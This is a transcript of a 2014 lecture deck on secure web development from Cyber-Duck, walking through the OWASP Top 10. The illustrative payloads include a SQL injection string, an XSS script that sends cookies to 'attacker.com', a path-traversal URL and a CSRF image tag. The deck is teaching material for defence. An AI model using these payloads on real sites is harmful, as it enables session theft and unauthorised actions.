Download pptx - Developing Secure Web Apps

Transcript

25/11/2014

Developing Secure Web Apps

Mark Garratt

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

2

Introduction

• Was: UH Student - Graduated 2012• Now: Full Stack Developer at Cyber-Duck• Things I do:

– Programmer: PHP, MySQL, Node.js (JavaScript), MongoDB, HTML/CSS etc.

– System Administrator: Linux server management– Security Tester: Reviewing and testing web apps

• Things I use:– TDD / BDD– Continuous Integration (Jenkins/Travis)– Vagrant + Docker

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

3

Knowledge Transfer Partnerships

“A relationship formed between a company and an academic institution ('Knowledge Base' partner), which facilitates the transfer of knowledge, technology and skills to which the company partner

currently has no access. Each partnership employs one or more recently qualified people (known as an Associate) to work in a

company on a project of strategic importance to the business, whilst also being supervised by the Knowledge Base Partner.

Projects vary in length between 12 and 36 months. The Associates are either postgraduate researchers, university graduates, or individuals qualified to at least NVQ (Level 4) or equivalent.”

WHEN YOU GRADUATE APPLY FOR THESE

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

4

This talk…

• A bit about Cyber-Duck• The development process• Server security• Application security• Testing

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

5

About Cyber-Duck

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

6

Our Clients

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

7

The process

• Research– Determine all security considerations for the project

• User Experience– Follow best practices

• Art Direction• Development

– Design production environment– Secure coding– Continuous testing

• Marketing• Support

– Bug reports– More testing

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

8

Server Security

• Type of server– Cloud, dedicated, shared, in-house

• Server stack– Operating system– Language / Technology– Database / Caching– Scaling options

• Protection– Anti-virus & Anti-malware– Firewalls & IPS– Back ups– Others…

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

9

Server Management

• Most servers have similar configurations• More clients = more traffic = more servers• Need a way to keep all of them up to date• We use Configuration Management software• Several available, Ansible, Chef, Puppet, etc.

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

10

We use Puppet

• Master server hold config for all servers• Agent servers read their config every half an hour• Patch once, everything updates• Able to use with Vagrant for development

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

11

Application Security

• Starts in the research phase of a project– Evaluate possible points of attack

• UX design application with secure methods• Security is most relevant during Development

– Be aware of vulnerabilities– Follow safe practices– Test for missed vulnerabilities

• Post-launch continue testing– Bugs may reveal vulnerabilities– Bug-fixes may create vulnerabilities

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

12

Staying aware of vulnerabilities

• Official lists and statistics – OWASP Top 10, CSA, etc.• Mailing lists• Industry news• Blogs• Social media – especially twitter• Common Vulnerability Scoring System (CVSS)

– https://web.nvd.nist.gov/ - 3,365 vulnerabilities in the last 3 months

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

13

OWASP Top 10

A1 InjectionA2 Broken Authentication and Session ManagementA3 Cross-Site Scripting (XSS)A4 Insecure Direct Object ReferencesA5 Security MisconfigurationA6 Sensitive Data ExposureA7 Missing Function Level Access ControlA8 Cross-Site Request Forgery (CSRF)A9 Using Components with Known VulnerabilitiesA10 Unvalidated Redirects and Forwards

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

14

Injection

• Most common is SQL injection• Applications are vulnerable when user input is not validated

Example:

<?php$prod = $_POST[‘prod_id’];$query = "SELECT * FROM users WHERE id LIKE '%$user%'";$result = mysql_query($query);

user_id = "' OR 1; #"

"SELECT * FROM users WHERE id LIKE '%' OR 1; #%'"

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

15

http://xkcd.com/327/

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

16

Broken Authentication and Session Management

• Misconfiguration of authentication and session management

• Attackers use this to compromise passwords, keys, session tokens or other valuable data

Example: Session Hijacking

http://example.com/loggedin?sess_id=a1b2c3d4e5f6

Victim emails this link, whoever receives the link is logged in to the victims account

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

17

Cross-Site Scripting (XSS)

• Occurs when un-validated user input is sent to the browser• Allows an attacker to execute scripts in the victims browser

Example: Comment forms

A comment is left:<script type=“text/javascript”> document.location = “http://attacker.com/post?cookie=“ + document.cookie;</script>

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

18

Insecure Direct Object References

• Internal implementations are revealed to the usere.g. file location or database key

• This is not properly protected allowing an attacker to manipulate the reference

Example:

http://example.com/user_uploads/my_image.pnghttp://example.com/user_uploads/../../.htaccess

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

19

Security Misconfiguration

• Several programs are required to run a single web application

• Any one of these can have a vulnerability if misconfigured• Secure settings should be defined, implemented, and

maintained, as defaults are often insecure.• Software should be kept up to date.

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

20

Sensitive Data Exposure

• Applications dealing with sensitive data must protect it• Suitable encryption or hashing must be used effectively• Data needs to be protected in transit and at rest

Example:

A website encrypts credit card data in the database using the built-in encryption mechanism. An injection vulnerability exists in the application allowing database data to be decrypted. If the application encrypted before storing the injection attack would only discover encrypted data.

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

21

Missing Function Level Access Control

• When a user logs in their access level is verified, this should also be verified on each subsequent request.

Example:A website has user and admin areas, an attacker logs in as a user and is redirected to:

http://example.com/user/dashboard

They then go to the following URL with full access:

http://example.com/admin

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

22

Cross-Site Request Forgery (CSRF)

• An attacker tricks a user into sending data from one website to another.

Example:A user is logged in to their bank account, which uses a session cookie. The user then visits an attackers website with the following code:

<img src=“http://bank.com/transfer?to=12345&amount=100” />

The cookie is sent so bank.com thinks the user made the request.

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

23

Using Components with Known Vulnerabilities• Modern web applications are built with libraries,

frameworks, plugins, etc. Vulnerabilities can exist in 3rd party code

• Not updating these libraries may introduce vulnerabilities• Dependency managers (composer, npm, etc.) can help with

this, but updates still need to be tested

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

24

Unvalidated Redirects and Forwards

• Sometimes it’s necessary to redirect a user from one application page to another. These redirects need to be validated to avoid misuse.

Example:

http://example.com/login?redirect=dashboard

Is changed by an attacker to

http://example.com/login?redirect=admin

15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.

25

Questions?

Contact

Mark [email protected]

@MGarratt88http://www.cyber-duck.co.uk